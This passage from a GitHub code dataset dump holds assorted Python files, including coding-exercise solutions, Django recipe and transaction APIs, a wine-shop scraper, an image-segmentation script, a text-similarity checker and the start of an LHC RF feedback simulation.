","repo_name":"SharmaPrakhar25/Leetcode_solutions","sub_path":"104-maximum-depth-of-binary-tree/104-maximum-depth-of-binary-tree.py","file_name":"104-maximum-depth-of-binary-tree.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"25221806597","text":"# Andre Pinto\n# @Coursera - Introdução ao Python I (USP)\n\ndef ePrimo(n):\n if n > 1:\n for i in range(2, n):\n if (n % i) == 0:\n return False\n else:\n return True\n return False\n\ndef n_primos(n):\n primos = 0\n for i in range(2, n + 1):\n if ePrimo(i):\n primos += 1\n return primos\n","repo_name":"andre6293/Introducao-a-Computacao","sub_path":"Part 1/Programming Assignment 5/opt_conta_primos.py","file_name":"opt_conta_primos.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3320897222","text":"# BOJ 1254 팰린드롬 만들기\ndef solution():\n s = list(str(input()))\n reverse_s = list(reversed(s))\n answer = len(s)\n for i in range(len(s)):\n\n if s[i:] == reverse_s[:len(s)-i]:\n answer += i\n break\n\n print(answer)\n\nif '__main__' == __name__:\n solution()","repo_name":"KKodiac/Python","sub_path":"BOJ/BruteForce/1254.py","file_name":"1254.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30204159953","text":"import os\nimport shutil\nfrom pathlib import Path\nfrom typing import List\n\nimport numpy as np\nfrom tqdm import tqdm\n\n\ndef move_train_val_test(train: List, val: List, test: List) -> None:\n \"\"\"Move train, val, test files to corresponding destination\"\"\"\n l_files = [train, val, test]\n l_paths = [train_path, val_path, test_path]\n\n for l_f, dest in zip(l_files, l_paths):\n if l_f:\n for f in tqdm(l_f):\n new_loc = os.path.join(dest,\n f.split(data_root)[-1].strip('/').split('/')[0],\n f.split(\"imgs/\")[-1].replace(\"/\", \"_\"))\n shutil.copy(f, new_loc)\n\n\nif __name__ == \"__main__\":\n train_txt = \"/mnt/sphere/projects/contour_integration/pathfinder_full/curv_contour_length_9/train.txt\"\n val_txt = \"/mnt/sphere/projects/contour_integration/pathfinder_full/curv_contour_length_9/val.txt\"\n test_txt = \"/mnt/sphere/projects/contour_integration/pathfinder_full/curv_contour_length_9/test.txt\"\n\n data_root = '/mnt/sphere/projects/contour_integration/pathfinder_full/curv_contour_length_9/'\n\n train_path = os.path.join(data_root, \"train\")\n val_path = os.path.join(data_root, \"val\")\n test_path = os.path.join(data_root, \"test\")\n\n data_paths = [train_path, val_path, test_path]\n\n for path in data_paths:\n path_pos = Path(os.path.join(path, \"curv_contour_length_9\"))\n path_neg = Path(os.path.join(path, \"curv_contour_length_9_neg\"))\n print(path_pos, path_neg)\n path_pos.mkdir(exist_ok=True, parents=True)\n path_neg.mkdir(exist_ok=True, parents=True)\n\n with open(train_txt, 'r') as f:\n train_f = f.readlines()\n train_f = [i.strip() for i in train_f]\n\n with open(val_txt, \"r\") as f:\n val_f = f.readlines()\n val_f = [i.strip() for i in val_f]\n\n with open(test_txt, \"r\") as f:\n test_f = f.readlines()\n test_f = [i.strip() for i in test_f]\n\n move_train_val_test(train_f, val_f, test_f)","repo_name":"vijayvee/pathfinder","sub_path":"prepare_train_test.py","file_name":"prepare_train_test.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"11837205880","text":"import io\n\nfrom django.db.models import Sum\nfrom django.http import FileResponse\nfrom django.shortcuts import get_object_or_404\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.pdfgen import canvas\nfrom rest_framework import filters, status, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom api.filters import RecipeFilter\nfrom api.permissions import IsAuthorOrReadOnly\nfrom recipes.models import (\n Favorite,\n Ingredient,\n IngredientRecipe,\n Recipe,\n ShoppingCart,\n Tag,\n)\nfrom recipes.serializers import (\n FavoriteSerializer,\n IngredientSerializer,\n RecipeSerializer,\n ShoppingCartSerializer,\n TagSerializer,\n)\n\n\nclass RecipeViewSet(viewsets.ModelViewSet):\n serializer_class = RecipeSerializer\n permission_classes = (IsAuthorOrReadOnly,)\n queryset = Recipe.objects.all()\n filter_backends = (DjangoFilterBackend,)\n filterset_class = RecipeFilter\n http_method_names = [\"post\", \"get\", \"patch\", \"delete\"]\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user)\n\n @action(detail=True, methods=[\"POST\", \"DELETE\"])\n def favorite(self, request, pk):\n user = request.user\n recipe = get_object_or_404(Recipe, pk=pk)\n data = {\"user\": user.id, \"recipe\": recipe.pk}\n if request.method == \"POST\":\n serializer = FavoriteSerializer(data=data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(\n data=serializer.data, status=status.HTTP_201_CREATED\n )\n if (\n request.method == \"DELETE\"\n and Favorite.objects.filter(**data).exists()\n ):\n Favorite.objects.get(**data).delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n return Response(\n data={\"errors\": \"Подписки не существует\"},\n status=status.HTTP_400_BAD_REQUEST,\n )\n\n @action(\n detail=True,\n methods=[\"POST\", \"DELETE\"],\n permission_classes=[IsAuthenticated],\n )\n def shopping_cart(self, request, pk):\n user = request.user\n recipe = get_object_or_404(Recipe, pk=pk)\n data = {\"user\": user.id, \"recipe\": recipe.pk}\n if request.method == \"POST\":\n serializer = ShoppingCartSerializer(data=data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(\n data=serializer.data, status=status.HTTP_201_CREATED\n )\n if (\n request.method == \"DELETE\"\n and ShoppingCart.objects.filter(**data).exists()\n ):\n ShoppingCart.objects.get(**data).delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n return Response(\n data={\"errors\": \"Этот рецепт отсутствует в списке покупок\"},\n status=status.HTTP_400_BAD_REQUEST,\n )\n\n @action(\n detail=False, methods=[\"GET\"], permission_classes=[IsAuthenticated]\n )\n def download_shopping_cart(self, request):\n buffer = io.BytesIO()\n p = canvas.Canvas(buffer)\n timesb = TTFont(\"TimesB\", \"data/timesbd.ttf\")\n times = TTFont(\"Times\", \"data/times.ttf\")\n pdfmetrics.registerFont(timesb)\n pdfmetrics.registerFont(times)\n p.setFont(\"TimesB\", 20)\n y = 800\n p.drawString(50, y, \"Список покупок:\")\n\n ingredients = (\n IngredientRecipe.objects.filter(\n recipe__in_shopping_cart__user=request.user\n )\n .values(\"ingredient__name\", \"ingredient__measurement_unit\")\n .annotate(value=Sum(\"amount\"))\n )\n\n for ingredient in ingredients:\n p.setFont(\"Times\", 16)\n line = (\n f'{ingredient[\"ingredient__name\"]}: '\n f'{ingredient[\"ingredient__measurement_unit\"]} '\n f'{ingredient[\"value\"]}'\n )\n y = y - 40\n p.drawString(50, y, line)\n\n p.showPage()\n p.save()\n buffer.seek(0)\n return FileResponse(buffer, as_attachment=True, filename=\"file.pdf\")\n\n\nclass TagViewSet(viewsets.ReadOnlyModelViewSet):\n pagination_class = None\n serializer_class = TagSerializer\n queryset = Tag.objects.all()\n\n\nclass IngredientViewSet(viewsets.ReadOnlyModelViewSet):\n pagination_class = None\n serializer_class = IngredientSerializer\n queryset = Ingredient.objects.all()\n filter_backends = (filters.SearchFilter,)\n search_fields = (\"^name\",)\n","repo_name":"Sl1m5hady/foodgram-project-react","sub_path":"backend/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72015338009","text":"\"\"\"\nTitle: Helicopter Wing Detector and Inverse Kinematics\nAuthor: James Beattie\nCreated: 22/02/2018\n\"\"\"\n\n# Imports\n########################################################################################################\n\nimport numpy as np;\nimport imageio; # reading in mp4 data\nimport matplotlib.pyplot as plt;\nimport skimage; # import image data\nfrom skimage.filters import try_all_threshold; # thresholding the image\nfrom skimage import filters, measure, data, io, segmentation, color;\nfrom skimage.future import graph;\nfrom skimage.morphology import square;\nimport matplotlib.patches as patches;\nimport matplotlib.patches as mpatches;\nimport argparse;\nimport colorsys;\n\n\n# Command Line Arguements\n########################################################################################################\n\nap \t\t\t= argparse.ArgumentParser(description = 'Input arguments');\nap.add_argument('-video','--video', required=False, help = 'specfiy the mp4 file');\nap.add_argument('-frame', '--frame',required=False, help = 'the total number of frames to run', type=int);\nargs \t\t= vars(ap.parse_args());\n\n########################################################################################################\n\n\n# Functions Declarations\n########################################################################################################\ndef read_video(vid_file=args['video']):\n\n vid = imageio.get_reader(vid_file, 'ffmpeg');\n return vid\n\ndef label_creator(image,colour):\n all_labels = measure.label(image)\n\n for region in measure.regionprops(all_labels):\n\n # skip small images\n if region.area < 50:\n continue\n\n # draw rectangle around segmented coins\n minr, minc, maxr, maxc = region.bbox\n rect = mpatches.Rectangle((minc, minr), maxc - minc, maxr - minr, fill=False, edgecolor=colour, linewidth=2)\n ax3.add_patch(rect)\n\ndef image_open_func(image):\n \"\"\" This function opens the pixel spaces until there are two regions\"\"\"\n openfactor = 10;\n image_open = skimage.morphology.opening(image,square(openfactor));\n all_labels = measure.label(image_open);\n\n while len(measure.regionprops(all_labels)) == 1:\n openfactor += 10;\n image_open = skimage.morphology.opening(image,square(openfactor));\n all_labels = measure.label(image_open);\n\n return image_open\n\n\n########################################################################################################\n\n# Working Script\n########################################################################################################\n\n# Declate the number of frames\nnums = args['frame'];\n\n# Loop through each frame\nfor num in xrange(100,nums):\n\n vid = read_video();\n image_ = vid.get_data(num);\n image_size = image_[:,:,0].shape\n\n # Segment Image\n labels1 = segmentation.slic(image_, compactness=10, n_segments=400);\n out1 = color.label2rgb(labels1, image_, kind='avg');\n g = graph.rag_mean_color(image_, labels1);\n labels2 = graph.cut_threshold(labels1, g, 30);\n out2 = color.label2rgb(labels2, image_, kind='avg');\n\n\n # Create a binary threshold using triangle thresholding.\n BinaryThreshold = labels2>filters.threshold_triangle(labels2);\n image_centering = np.zeros(BinaryThreshold.shape);\n image_centering[200:1000,:] = BinaryThreshold[200:1000,:];\n image_open = image_open_func(image_centering);\n out3 = color.label2rgb(image_open, image_, kind='avg');\n\n\n ########################\n # Visualisation\n ########################\n\n f, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(15, 8), sharey=True, dpi=150)\n\n ax1.imshow(out2);\n ax1.axis('off');\n ax1.set_title('Region Adjaceny Graph Seg: {} classes'.format(labels2.max()+1));\n\n ax2.imshow(out3);\n ax2.axis('off');\n ax2.set_title('Binary Triangle Threshold');\n\n ax3.imshow(image_);\n ax3.axis('off');\n ax3.set_title('Original');\n\n # Label Regions\n label_creator(image_centering,'red');\n label_creator(image_open,'green');\n\n f.tight_layout();\n f.savefig('helic_{}_RAGCUT{}'.format(args['video'],num) + '.png');\n plt.close(f);\n","repo_name":"AstroJames/PaperHelicopterInvert","sub_path":"helicopter_detector.py","file_name":"helicopter_detector.py","file_ext":"py","file_size_in_byte":4342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37245347844","text":"from django.urls import reverse\nfrom django.http import HttpResponse\n\n\ndef home(request):\n response = ['

WELCOME

',\n '
',\n '
', '
'\n ''\n ]\n return HttpResponse(''.join(response))\n","repo_name":"SapirShamai/currency_exchange_and_weather_forcast_django_project","sub_path":"my_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22990957150","text":"from bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\nimport re\n\n\ndef scrape_wines(url, output, headers = ['Name', 'Beschreibung']):\n \"\"\"\n Scrape wines from https://www.divino.de\n :param headers: Headers for the output table\n :param url: Full URL after choosing desired filters and choosing the number of elements per page e.g. https://www.divino.de/wein-aus-deutschland?sPage=1&sPerPage=48 OR https://www.divino.de/weisswein?p=1&n=12\n :param output: Absolute path where the data will be saved as XLSX file e.g. C:/Users/user/Desktop/wines.xlsx\n :return:\n \"\"\"\n data = []\n req = requests.get(url)\n soup = BeautifulSoup(req.text, 'lxml')\n\n page_to_parent_elem = soup.find('div', {\"class\": \"display_sites\"})\n\n page_to = 1\n if page_to_parent_elem:\n page_to_elem = page_to_parent_elem.findAll('strong')\n if (page_to_elem):\n page_to = page_to_elem[1].text\n\n for i in range(1, int(page_to) + 1):\n if i != 1:\n if 'Page=' in url:\n req = requests.get(url.replace(f'Page=1', f'Page={i}', 1))\n else:\n req = requests.get(url.replace(f'p=1', f'p={i}', 1))\n soup = BeautifulSoup(req.text, 'lxml')\n\n wines = soup.find_all('div', {\"class\": \"divinoArtbox\"})\n for wine in wines:\n url_details = wine.find('a')['href']\n details = requests.get(url_details)\n imageContainerText = wine.find('a')['style']\n image = imageContainerText[imageContainerText.find(\"(\")+1:imageContainerText.find(\")\")]\n\n price = re.findall(\"\\d+(?:\\.\\d+)?,\\d+\", wine.find('span', attrs={\"class\": 'price'}).text)[0]\n\n soup = BeautifulSoup(details.text, 'lxml')\n\n name_container = soup.find('div', attrs={\"id\": 'detailbox'})\n name = name_container.find('h1').text\n\n description_container = soup.find('div', attrs={\"id\": 'description'})\n description_parts = description_container.find_all('p')\n\n description = ''\n for desc_part in description_parts:\n if desc_part.text.startswith('Wichtige Informationen'):\n break\n description = description + desc_part.text + ' '\n\n properties_container = soup.find('ul', {\"class\": \"description_properties\"})\n properties = properties_container.findAll('li')\n\n row_data = {'Name': name, 'Beschreibung': description, 'Preis': price, 'Details-URL': url_details, 'Image': image}\n\n for prop in properties:\n prop_value = prop.findAll('span')\n\n header = prop_value[0].text.strip()\n row_data[header] = prop_value[1].text.strip()\n\n data.append(row_data)\n\n df = pd.DataFrame(data, columns=headers)\n df.to_excel(output, engine='xlsxwriter')","repo_name":"stojkovicv/WineRecommender","sub_path":"local_scrapers/scrape_wines_divino.py","file_name":"scrape_wines_divino.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5692360780","text":"from gensim import corpora, models, similarities\nimport gensim\nimport numpy as np\nimport jieba\nimport sys\nimport re\n\n\ndef drop_punctuation(text):\n punc = '”~`!#$%^&*()_+-=|\\';\"":/.,?><~·!@#¥%……&*()——+-=“:’;、。,?》{《}】【\\n\\]\\[ '\n new_text = re.sub(r\"[%s]+\" % punc, \"\", text)\n return new_text\n\n\ndef Separatesentence(words):\n texts = [jieba.lcut(text)for text in words]\n return texts\n\n\ndef main():\n arg = sys.argv # 读取参数(文件目录)\n f = open(arg[1], 'r', encoding='utf-8')\n f2 = open(arg[2], 'r', encoding='utf-8')\n lines = f.read() #读文件\n lines_del = drop_punctuation(lines)\n lines_sep = Separatesentence([lines_del]) # 标准文件分词数组\n lines_sep.append(['占位']) #列表添加列表元素,使得lines_sep元素都是列表,将为一维\n line2 =jieba.lcut(drop_punctuation(f2.read())) # 查重文件分词数组\n f.close()\n f2.close()\n print(\"标准文件\", lines_sep)\n print(\"标准文件维度\"f'{(np.array(lines_sep)).shape}')\n print('要查重的文件', line2)\n print(\"line2维度\"f'{(np.array(line2)).shape}')\n dictionary = corpora.Dictionary(lines_sep) # 唯一词典\n num_features = len(dictionary.token2id) # dictionary.token2id 为词语打上标签\n print('词典:', dictionary.token2id)\n corpus = [dictionary.doc2bow(text)for text in lines_sep] # dictionary.doc2bow(text) 统计每个词语重复的次数\n print('语料库:', corpus)\n print(\"corpus向量\", corpus)\n print(\"字库向量维度\"f'{(np.array(corpus)).shape}')\n # corpus = dictionary.doc2bow(lines_sep)\n # new_vec = dictionary.doc2bow(line2)\n new_vec = [dictionary.doc2bow(text) for text in [line2]]\n print(\"查重文件new_vec向量\", new_vec[0]) #new_vec向量为三维,取首二维元素\n print(\"new_vec向量维度\"f'{(np.array(new_vec[0])).shape}')\n # corpu = np.array(new_vec)\n # print(f'{corpu.shape}')\n print('====================================================')\n tfidf = models.TfidfModel(corpus, dictionary=dictionary) #构建TF-IDF模型,用corpus来训练模型\n corpus_tfidf = tfidf[corpus]\n test_vec_tfidf = tfidf[new_vec[0]]\n index = similarities.SparseMatrixSimilarity(corpus_tfidf, num_features=len(dictionary.keys()))\n print('\\nTF-IDF模型的稀疏向量集:')\n for a in corpus_tfidf:\n print(a)\n print('\\nTF-IDF模型的查重文件稀疏向量:')\n print(test_vec_tfidf)\n print('\\n相似度计算:')\n sim = index[test_vec_tfidf]\n print(sim[0])\n np.savetxt(arg[3]+'\\结果.txt',sim) #查重结果保存本地\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n main()\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"away-back/3120005068","sub_path":"project论文查重/源代码/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27869834439","text":"# -*- coding: UTF-8 -*-\n\nfrom checkers.board import Board\nfrom checkers.player import HumanPlayer, RandomPlayer\n\n\nclass Game(object):\n \"\"\"Playing a game\"\"\"\n BEGIN = 0\n END = 1\n PROGRESS = 2\n\n def __init__(self, black_player, white_player):\n self._width = 3\n self._board = Board(self._width)\n self._black_player = black_player\n self._white_player = white_player\n self._current_player = self._black_player\n self._moves = []\n self._steps = 0\n self._state = Game.BEGIN\n self._winner = None\n\n @property\n def moves(self):\n return self._moves\n\n @property\n def steps(self):\n return self._steps\n\n def play(self):\n while self._state != Game.END:\n i, j = self._current_player.next_move(self._board)\n if self._current_player == self._black_player:\n self._board.move(i, j, Board.BLACK)\n self._current_player = self._white_player\n self._moves.append((i, j, Board.BLACK))\n else:\n self._board.move(i, j, Board.WHITE)\n self._current_player = self._black_player\n self._moves.append((i, j, Board.WHITE))\n if self._state == Game.BEGIN:\n self._state = Game.PROGRESS\n self._steps += 1\n\n if self._board.check_state() == Board.WHITE:\n self._winner = self._white_player\n self._state = Game.END\n\n if self._board.check_state() == Board.BLACK:\n self._winner = self._black_player\n self._state = Game.END\n\n @property\n def winner(self):\n if self._winner == self._white_player:\n return 'WHITE'\n elif self._winner == self._black_player:\n return 'BLACK'\n else:\n return 'Nobody'\n\n\nif __name__ == '__main__':\n James = RandomPlayer('James')\n Peter = HumanPlayer('Peter')\n a_game = Game(James, Peter)\n assert a_game.winner == 'Nobody'\n\n a_game.play()\n print('The steps is {s}'.format(s=a_game.steps))\n print('The winner is {w}'.format(w=a_game.winner))\n for i, j, val in a_game.moves:\n print('{i}, {j} : {val}'.format(i=i, j=j, val=val))\n","repo_name":"xuesj/Checkers","sub_path":"checkers/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3396432418","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('warehouse', '0015_profile'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='profile',\n old_name='session_id',\n new_name='session_value',\n ),\n migrations.AddField(\n model_name='profile',\n name='session_name',\n field=models.CharField(max_length=255, null=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"smn/goggles","sub_path":"goggles/warehouse/migrations/0016_auto_20141223_1014.py","file_name":"0016_auto_20141223_1014.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20466540186","text":"import logging\nfrom application.app_logging import logger\nfrom application import create_app\n\n\nif __name__ != \"__main__\":\n # Production mode via gunicorn\n gunicorn_logger = logging.getLogger(\"gunicorn.error\")\n logger.handlers = gunicorn_logger.handlers\n logger.setLevel(gunicorn_logger.level)\n\napp = create_app()\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"whittedb/bubblymist_equipment_backend","sub_path":"wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18939507968","text":"from graphframes.examples import Graphs\ng = Graphs(sqlContext).friends() # Get example graph\n\n# Run PageRank until convergence to tolerance \"tol\".\nresults = g.pageRank(resetProbability=0.15, tol=0.01)\n# Display resulting pageranks and final edge weights\n# Note that the displayed pagerank may be truncated, e.g., missing the E notation.\n# In Spark 1.5+, you can use show(truncate=False) to avoid truncation.\nresults.vertices.select(\"id\", \"pagerank\").show()\nresults.edges.select(\"src\", \"dst\", \"weight\").show()\n\n# Run PageRank for a fixed number of iterations.\nresults2 = g.pageRank(resetProbability=0.15, maxIter=10)\n\n# Run PageRank personalized for vertex \"a\"\nresults3 = g.pageRank(resetProbability=0.15, maxIter=10, sourceId=\"a\")\n","repo_name":"yoninachmany/datascience","sub_path":"ApacheSpark/examples/pagerank/pagerank_graphframes.py","file_name":"pagerank_graphframes.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41186504596","text":"from django.shortcuts import render, get_object_or_404\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\n\nfrom rest_framework import generics\nfrom rest_framework.decorators import api_view, permission_classes \nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nimport json\n\nfrom transactions.serializers import TransactionReadSerializer, TransactionCreateSerializer, ExchangeSerializer, TransactionVerificationSerializer\nfrom transactions.models import Transaction\n\nclass TransactionListCreateView(generics.ListCreateAPIView):\n queryset = Transaction.objects.all()\n serializer_class = TransactionReadSerializer\n serializer_class_write = TransactionCreateSerializer\n\n permission_classes = (IsAuthenticated,)\n\n def get_serializer_class(self):\n if self.request.method == 'POST':\n if hasattr(self, 'serializer_class_write'):\n return self.serializer_class_write\n else:\n return super().get_serializer_class()\n\n # TODO: Do this with object_permission maybe! This is a crude way I think\n def initial(self, request, *args, **kwargs):\n if request.method == 'POST':\n if request.data['from_user'] != self.request.user.id:\n self.permission_denied(request, message=getattr(IsAuthenticated, 'message', None))\n return super().initial(request, *args, **kwargs)\n\n def create(self, request, *args, **kwargs):\n resp = super().create(request, *args, **kwargs)\n from_user = User.objects.get(pk=resp.data['from_user'])\n first_name = from_user.first_name\n last_name = from_user.last_name\n amount = resp.data['amount']\n user = User.objects.get(pk=resp.data['to_user'])\n device = user.fcmdevice_set.first()\n if device != None:\n device.send_message(title='New Transaction', body=f'{first_name} {last_name} gave you {amount}!', sound='default')\n return resp\n\nclass MyTransactionsWithEveryone(generics.ListAPIView):\n queryset = Transaction.objects.all()\n serializer_class = TransactionReadSerializer\n\n permission_classes = (IsAuthenticated,)\n\n def get_queryset(self):\n if self.request.method == 'GET':\n user = self.request.user\n return Transaction.objects.filter(Q(from_user=user) | Q(to_user=user)).order_by('-date')\n else:\n return super().get_queryset()\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef myExchangeWithEveryoneView(request):\n if request.method == 'GET':\n results = User.objects.raw(\"select auth_user.id, auth_user.first_name, auth_user.last_name, auth_user.username, ((select coalesce((select sum(amount) from transactions_transaction WHERE from_user_id=%s AND to_user_id=auth_user.id AND verified='true' GROUP BY to_user_id), 0)) - (select coalesce((select sum(amount) from transactions_transaction WHERE from_user_id=auth_user.id AND to_user_id=%s AND verified='true' GROUP BY to_user_id), 0))) AS exchange from auth_user where auth_user.id <> %s\", [request.user.id, request.user.id, request.user.id])\n exchanges = ExchangeSerializer(results, many=True) \n return Response(exchanges.data)\n\nclass MyTransactionsWithSomeone(generics.ListAPIView):\n queryset = Transaction.objects.all()\n serializer_class = TransactionReadSerializer\n permission_classes = (IsAuthenticated,)\n\n def get_queryset(self):\n if self.request.method == 'GET':\n user = self.request.user\n other_guy = get_object_or_404(User, id=self.request.GET.get('id'))\n return Transaction.objects.filter(Q(from_user=user, to_user=other_guy) | Q(to_user=user, from_user=other_guy)).order_by('-date')\n else:\n return super().get_queryset()\n\nclass VerifyTransaction(generics.UpdateAPIView):\n queryset = Transaction.objects.all()\n serializer_class = TransactionVerificationSerializer\n permission_classes = (IsAuthenticated,)\n\n def check_object_permissions(self, request, obj):\n if request.user.id != obj.to_user.id:\n self.permission_denied(request, message=getattr(IsAuthenticated, 'message', None))\n return super().check_object_permissions(request, obj)\n\n def partial_update(self, request, *args, **kwargs):\n request.data.update({\n \"verified\": True\n })\n return super().partial_update(request, *args, **kwargs)\n\nclass UnVerifiedTransactions(generics.ListAPIView):\n queryset = Transaction.objects.all()\n serializer_class = TransactionReadSerializer\n permission_classes = (IsAuthenticated,)\n\n def get_queryset(self):\n queryset = super().get_queryset()\n return queryset.filter(to_user=self.request.user, verified=False)\n\nclass TransactionDeleteView(generics.DestroyAPIView):\n queryset = Transaction.objects.all()\n serializer_class = TransactionReadSerializer\n permission_classes = (IsAuthenticated,)\n\n def check_object_permissions(self, request, obj):\n if request.user.id != obj.to_user.id:\n self.permission_denied(request, message=getattr(IsAuthenticated, 'message', None))\n return super().check_object_permissions(request, obj)\n\n def destroy(self, request, *args, **kwargs):\n instance = self.get_object()\n self.perform_destroy(instance)\n return Response(\"{}\", status=status.HTTP_204_NO_CONTENT)","repo_name":"moazin/easylend-server","sub_path":"transactions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33617006075","text":"#! C:\\Users\\AdiminiChen\\AppData\\Local\\Programs\\Python\\Python310\n# coding=utf-8\n# @Time: 2023/3/4 16:36\n# @Author: jackchen\n\nimport time\n\nimport pytest\n\nfrom config.driver_config import DriverConfig\nfrom page.LoginPage import LoginPage\nfrom page.LeftMenuPage import LeftMenuPage\nfrom page.GoodsPage import GoodsPage\n\n\"\"\"\ngoods_title:商品标题\ngoods_details:商品描述\ngoods_num:商品数量\ngoods_pic_list:商品图片名字 --列表\ngoods_price:商品单价\ngoods_status:商品状态\nbutton:提交\n\"\"\"\ngoods_info_list = [\n {\"goods_title\": \"商品1\",\n \"goods_details\": \"商品1的描述\",\n \"goods_num\": 5,\n \"goods_pic_list\": [\"goods_one.png\"],\n \"goods_price\": 233,\n \"goods_status\": \"上架\",\n \"button\": \"提交\"\n },\n {\"goods_title\": \"商品2\",\n \"goods_details\": \"商品2的描述\",\n \"goods_num\": 3,\n \"goods_pic_list\": [\"goods_one.png\"],\n \"goods_price\": 2330,\n \"goods_status\": \"上架\",\n \"button\": \"提交\"\n }\n]\n\n\nclass TestAddGoods:\n\n # @pytest.fixture()\n # def driver(self):\n # get_driver = DriverConfig().driver_config()\n # yield get_driver\n # get_driver.quit()\n @pytest.mark.parametrize(\"goods_info\", goods_info_list) # 参数化\n def test_add_goods_01(self, driver, goods_info):\n # get_driver = DriverConfig().driver_config()\n LoginPage().login(driver, \"jay\")\n LeftMenuPage().click_level_one_menu(driver, '产品')\n time.sleep(0.5)\n LeftMenuPage().click_level_two_menu(driver, '新增二手商品')\n time.sleep(0.5)\n GoodsPage().add_goods_process(driver, goods_info[\"goods_title\"], goods_info[\"goods_details\"],\n goods_info[\"goods_num\"],\n goods_info[\"goods_pic_list\"], goods_info[\"goods_price\"],\n goods_info[\"goods_status\"], goods_info['button'])\n time.sleep(3)\n","repo_name":"flychen0310/trading_system_UiAtuoTest","sub_path":"testcases/test_add_goods.py","file_name":"test_add_goods.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14707295824","text":"'''\nFile to measure the closed loop response of the LHC RFFB.\n\nAuthor: Birk Emil Karlsen-Bæck\n'''\n\n# Imports -------------------------------------------------------------------------------------------------------------\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Homemade files\nimport utility_files.measurement_utilites as mut\nimport utility_files.signal_utilities as sut\n\nfrom blond.beam.beam import Beam, Proton\nfrom blond.beam.profile import Profile, FitOptions, CutOptions\nfrom blond.input_parameters.ring import Ring\nfrom blond.input_parameters.rf_parameters import RFStation\n\n# Cavity Controller\nfrom blond.llrf.cavity_feedback import LHCRFFeedback, LHCCavityLoop\nfrom blond.llrf.transfer_function import TransferFunction\n\nplt.rcParams.update({\n 'text.usetex': True,\n 'text.latex.preamble': r'\\usepackage{fourier}',\n 'font.family': 'serif',\n 'font.size': 16\n })\n\n# Options -------------------------------------------------------------------------------------------------------------\nPLT_MODEL_TF = False\nPLT_MEAS_TF = False\nPLT_COMP = True\n\n# Parameters ----------------------------------------------------------------------------------------------------------\n# Machine and RF parameters\nC = 26658.883 # Machine circumference [m]\np_s = 450e9 # Synchronous momentum [eV/c]\nh = 35640 # Harmonic number\nV = 4e6 # RF voltage [V]\ndphi = 0 # Phase modulation/offset\ngamma_t = 53.8 # Transition gamma\nalpha = 1./gamma_t/gamma_t # First order mom. comp. factor\n\n# Bunch parameters\nN_b = 1e9 # Intensity\nN_p = 50000 # Macro-particles\ntau_0 = 0.4e-9 # Initial bunch length, 4 sigma [s]\n\n# Simulation Objects --------------------------------------------------------------------------------------------------\nring = Ring(C, alpha, p_s, Particle=Proton(), n_turns=1)\nrf = RFStation(ring, [h], [V], [dphi])\n\nbeam = Beam(ring, N_p, N_b)\nprofile = Profile(beam, CutOptions(n_slices=100),\n FitOptions(fit_option='gaussian'))\n\n\nphase = np.array([0, 0, 0])\ngain = 